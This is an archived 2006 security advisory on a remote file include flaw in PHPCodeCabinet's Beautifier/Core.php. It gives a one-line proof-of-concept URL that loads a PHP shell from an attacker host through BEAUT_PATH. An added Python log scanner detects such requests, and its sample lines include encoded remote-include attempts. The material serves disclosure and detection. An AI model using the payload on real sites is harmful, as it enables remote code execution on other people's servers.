PHPCodeCabinet.txt

18 Aug 2006 00:00:00 | Reported by: Minion | Type: packetstorm | Source: packetstormsecurity.com

PHPCodeCabinet vulnerable to remote file include in /include/Beautifier/Core.ph

`
  
>>From Minion:  
  
PHPCodeCabinet (all versions) is vulnerable to a remote file include.  
  
The vulnerable code is in /include/Beautifier/Core.php  
  
$BEAUT_PATH was not properly scrubbed, so they got owned.  
  
Proof of concept:  
  
*target phpcodecabinet  
directory*/include/Beautifier/Core.php?BEAUT_PATH=*evilsite*/Beautifier/HFile.php  
  
HFile.php would be your php shell.  
  
Shouts to XoRcrew & Disruptiv.  
  
`
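
A defender-side check for the pattern the advisory describes, as an added example that is not part of the advisory or of PHPCodeCabinet: it scans web-server access logs for requests that pass `BEAUT_PATH` to `Core.php` and separates values that point outside the local tree from other overrides. The Combined Log Format, the `/pcc/` install prefix, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Value starting with a URL scheme (http://, ftp://, php://, data:) or a
# UNC-style prefix, i.e. an include target outside the local source tree.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]+:|//|\\\\)', re.I)
SCRIPT = "/include/beautifier/core.php"  # path from the advisory, lower-cased
PARAM = "BEAUT_PATH"                     # variable named in the advisory

SAMPLE_LOG = [  # constructed log lines, not taken from a real server
    '192.0.2.10 - - [18/Aug/2006:10:00:01 +0000] "GET /pcc/include/Beautifier/Core.php?BEAUT_PATH=http://remote.example/x HTTP/1.1" 200 512',
    '192.0.2.11 - - [18/Aug/2006:10:00:05 +0000] "GET /pcc/include/Beautifier/Core.php?BEAUT_PATH=hTTp%253a%252f%252fremote.example HTTP/1.1" 200 512',
    '192.0.2.12 - - [18/Aug/2006:10:00:09 +0000] "GET /pcc/include/Beautifier/Core.php?BEAUT_PATH=../lib HTTP/1.1" 200 87',
    '192.0.2.13 - - [18/Aug/2006:10:00:12 +0000] "GET /pcc/index.php?page=home HTTP/1.1" 200 4096',
]


def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding (%252f -> %2f -> /), bounded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return 'remote-include', 'param-override' or None for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not fully_unquote(url.path).lower().endswith(SCRIPT):
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == PARAM:  # any request-supplied value is suspect here
            remote = REMOTE_RE.match(fully_unquote(value))
            return "remote-include" if remote else "param-override"
    return None


def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    verdicts = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in verdicts if v]
```

Access logs record only the request line, so this covers values sent in the query string; anything carried in a request body needs body logging or a WAF rule instead.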

Vulners AI Score: 7.4 (High risk)